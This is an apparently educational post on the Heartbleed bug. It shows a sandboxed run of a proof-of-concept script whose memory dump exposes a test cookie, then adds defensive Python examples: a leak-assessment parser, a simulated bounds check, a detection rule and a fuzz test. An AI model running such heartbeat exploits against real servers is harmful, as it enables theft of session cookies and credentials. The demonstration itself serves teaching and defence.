Heartbleed: Viewing Session Information
A major problem within the Heartbleed vulnerability is that an intruder can see the running memory of the Web server. As this memory often contains running data, such as session variables, passwords, encryption keys, and so on, it can reveal sensitive user information. In this sandboxed demo, we can see that the cookie information sent by the client can be read from the running memory of the server:
From this we can see that the captured memory is:
billbuchanan@bills-mbp:~$ python heartbleed-poc.py 172.16.121.150
Scanning 172.16.121.150 on port 443
Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 66
 ... received message: type = 22, ver = 0302, length = 937
 ... received message: type = 22, ver = 0302, length = 331
 ... received message: type = 22, ver = 0302, length = 4
Server TLS version was 1.2
Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
  0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C  .@....SC[...r...
  0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90  .+..H...9.......
  0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0  .w.3....f.....".
  0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00  !.9.8.........5.
  0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................
  0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00  ............3.2.
  0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00  ....E.D...../...
  0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00  A...............
  0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................
  0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00  ..I...........4.
  00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00  2...............
  00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00  ................
  00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................
  00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 2E 38 0D 0A  ....#........8..
  00e0: 41 63 63 65 70 74 2D 4C 61 6E 67 75 61 67 65 3A  Accept-Language:
  00f0: 20 65 6E 2D 67 62 2C 65 6E 3B 71 3D 30 2E 35 0D   en-gb,en;q=0.5.
  0100: 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69 6E 67  .Accept-Encoding
  0110: 3A 20 67 7A 69 70 2C 20 64 65 66 6C 61 74 65 0D  : gzip, deflate.
  0120: 0A 43 6F 6F 6B 69 65 3A 20 74 65 73 74 63 6F 6F  .Cookie: testcoo
  0130: 6B 69 65 3D 68 65 6C 6C 6F 2B 62 69 6C 6C 0D 0A  kie=hello+bill..
  0140: 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 6B 65 65 70  Connection: keep
  0150: 2D 61 6C 69 76 65 0D 0A 0D 0A 5C A1 0F 0A E2 D8  -alive....\.....
  0160: 66 30 62 A9 FC 99 A3 B7 A0 C4 00 00 00 00 00 00  f0b.............
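When assessing the impact of a leak like the one above, an incident responder wants to know which credential-bearing headers were exposed without copying the secret values themselves into a report. The following is an added example, not part of the original post or of the heartbleed-poc.py script it runs: it parses the "offset: hex bytes  ascii" dump format shown above (the four input lines are copied from the dump at offsets 0x120 to 0x150) and reports the position and length of any Cookie, Set-Cookie or Authorization header found in the recovered bytes. The header list is an assumption; extend it to whatever your application treats as a credential.

```python
import re

# Four lines copied from the heartbeat response dump on this page (offsets 0x120-0x150).
DUMP_LINES = r"""
0120: 0A 43 6F 6F 6B 69 65 3A 20 74 65 73 74 63 6F 6F  .Cookie: testcoo
0130: 6B 69 65 3D 68 65 6C 6C 6F 2B 62 69 6C 6C 0D 0A  kie=hello+bill..
0140: 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 6B 65 65 70  Connection: keep
0150: 2D 61 6C 69 76 65 0D 0A 0D 0A 5C A1 0F 0A E2 D8  -alive....\.....
""".strip().splitlines()

HEX_BYTE = re.compile(r"^[0-9A-Fa-f]{2}$")
# Assumed list of headers whose values are credentials; Set-Cookie goes first so the
# alternation does not match the "Cookie" suffix inside it.
SENSITIVE = re.compile(rb"\b(Set-Cookie|Cookie|Authorization):[ \t]*([^\r\n]*)", re.IGNORECASE)


def parse_dump(lines):
    """Turn 'OFFSET: up to 16 hex bytes  ascii' lines back into (base_offset, bytes).
    Only the hex column is trusted; the ASCII column is a lossy rendering of it."""
    base = None
    out = bytearray()
    for line in lines:
        tokens = line.split()
        if not tokens or not tokens[0].endswith(":"):
            continue
        offset = int(tokens[0][:-1], 16)
        if base is None:
            base = offset
        elif offset != base + len(out):
            raise ValueError("non-contiguous dump at offset %#x" % offset)
        # At most 16 bytes per line; stop at the first token that is not a hex pair
        # (the start of the ASCII column).
        for tok in tokens[1:17]:
            if not HEX_BYTE.match(tok):
                break
            out.append(int(tok, 16))
    return base, bytes(out)


def find_sensitive_headers(lines):
    """Report which credential-bearing HTTP headers appear in leaked memory.
    Values are never returned, only their offset and length, so the result can be logged."""
    base, data = parse_dump(lines)
    findings = []
    for m in SENSITIVE.finditer(data):
        findings.append({
            "header": m.group(1).decode("ascii"),
            "offset": base + m.start(1),
            "value_len": len(m.group(2)),
        })
    return findings


if __name__ == "__main__":
    for f in find_sensitive_headers(DUMP_LINES):
        print("%(header)s header at offset %(offset)#x, value length %(value_len)d" % f)
```

Run against the copied lines it reports a single Cookie header at offset 0x121 with a 21-byte value; the Connection header is ignored because it carries no credential. Feeding the whole dump instead of four lines works the same way, since the parser only requires the offsets to be contiguous.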
Often a cookie is used to hold things like a session ID and/or login credentials, so an intruder who reads it from memory can steal these and log into the system.
How can we protect against this?
Well, it is actually quite difficult. The reason this has happened is that OpenSSL is seen as a highly trusted program, so it is allowed to read from sensitive areas of memory. This memory contains the program's data, such as its running variables, and can thus contain usernames, passwords, encryption keys, and so on. If we trust a program so highly, there are often very few checks that the operating system makes on how it operates. Other programs, such as those written for Microsoft .NET and Java, run within a completely sandboxed environment, so there are checks on what they can access; this is known as managed code. Unfortunately a highly trusted component, especially one written in a low-level language such as C++, can gain access to sensitive areas that many other programs would not have rights to. The solution is therefore really on the software development side, and it highlights the need to continually check programs for their operation, not only with normal data but with extreme data input. Unfortunately many software developers do not spend enough time testing, and often they test their own code. So we need a whole new generation of people who know how to write code and also how to test it. These people are not likely to actually write the code, but they are the people who will understand it, and who know how to review and test it.
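The testing with extreme input that the paragraph above calls for is easy to show on the heartbeat message itself. The following is an added example, not code from the original post or from OpenSSL: a small simulation in which a heartbeat body sits in a constructed bytearray standing in for the process heap. The handler either trusts the 2-byte declared payload length (the defect) or first applies a bounds check equivalent to the one the OpenSSL fix introduced, namely that 1 (type) + 2 (length) + declared payload + 16 (padding) must fit inside the record actually received. It also shows the wire-side observation a network defender can use, that a heartbeat response longer than the request it answers carried bytes the client never sent, and a randomised check over declared lengths that a test engineer could keep in a regression suite. Everything named here (build_heartbeat, handle_heartbeat, the secret string) is constructed for the example.

```python
import random
import struct

TLS_HEARTBEAT = 24              # TLS content type for heartbeat records (RFC 6520)
HB_REQUEST, HB_RESPONSE = 1, 2  # HeartbeatMessageType values
MIN_PADDING = 16                # RFC 6520: at least 16 bytes of padding follow the payload


def build_heartbeat(payload, declared_len=None, padding=MIN_PADDING):
    """Build a HeartbeatMessage body: type, 2-byte payload_length, payload, padding.
    declared_len lets a test claim a longer payload than the bytes actually sent."""
    if declared_len is None:
        declared_len = len(payload)
    return struct.pack("!BH", HB_REQUEST, declared_len) + payload + bytes(padding)


def payload_fits(body):
    """Bounds check equivalent to the OpenSSL fix: type + length + declared payload
    + minimum padding must all lie inside the record that was really received."""
    if len(body) < 3:
        return False
    _, declared = struct.unpack("!BH", body[:3])
    return 1 + 2 + declared + MIN_PADDING <= len(body)


def handle_heartbeat(memory, start, body_len, strict):
    """Simulated server handler. `memory` is a constructed bytearray standing in for the
    heap; the heartbeat body occupies memory[start:start+body_len] (body_len >= 3).
    strict=False copies `declared` bytes from the payload pointer whatever was received
    (the bug); strict=True silently drops a record whose declared length does not fit."""
    body = bytes(memory[start:start + body_len])
    if strict and not payload_fits(body):
        return None
    _, declared = struct.unpack("!BH", body[:3])
    payload_start = start + 3
    echoed = bytes(memory[payload_start:payload_start + declared])
    return struct.pack("!BH", HB_RESPONSE, declared) + echoed + bytes(MIN_PADDING)


def response_overlong(request_body, response_body):
    """Wire-side detection rule: a response longer than its request is echoing
    bytes the client never sent."""
    return len(response_body) > len(request_body)


def demo():
    """Place a 4-byte heartbeat next to a constructed secret and compare both handlers."""
    secret = b"Cookie: testcookie=hello+bill\r\n"      # constructed, modelled on the dump above
    request = build_heartbeat(b"ping", declared_len=64)  # claims 64 bytes, sends 4
    memory = bytearray(request + secret + bytes(64))
    leaky = handle_heartbeat(memory, 0, len(request), strict=False)
    fixed = handle_heartbeat(memory, 0, len(request), strict=True)
    return {
        "leaked_secret": leaky is not None and secret in leaky,
        "leaky_flagged": response_overlong(request, leaky),
        "fixed_dropped": fixed is None,
    }


def fuzz_declared_lengths(trials=500, seed=1):
    """The extreme-input test the text asks for: random declared lengths against a
    fixed 8-byte payload. Returns True if the strict handler never echoes more
    bytes than the client actually sent."""
    rng = random.Random(seed)
    payload = b"\xaa" * 8
    for _ in range(trials):
        declared = rng.randint(0, 0xFFFF)
        body = build_heartbeat(payload, declared_len=declared)
        memory = bytearray(body + bytes(0x10000))  # plenty of 'heap' after the record
        resp = handle_heartbeat(memory, 0, len(body), strict=True)
        if resp is not None and len(resp) - 3 - MIN_PADDING > len(payload):
            return False
    return True


if __name__ == "__main__":
    print(demo())
    print("strict handler survived fuzzing:", fuzz_declared_lengths())
```

The demo shows the three facts a reviewer cares about: the unchecked handler returns the neighbouring cookie, the over-long response is visible on the wire without any knowledge of server internals, and the checked handler discards the malformed record. The fuzzing loop is the kind of test the paragraph argues for: it does not need to know how the bug works, only that a declared length which disagrees with the bytes received must never widen the reply.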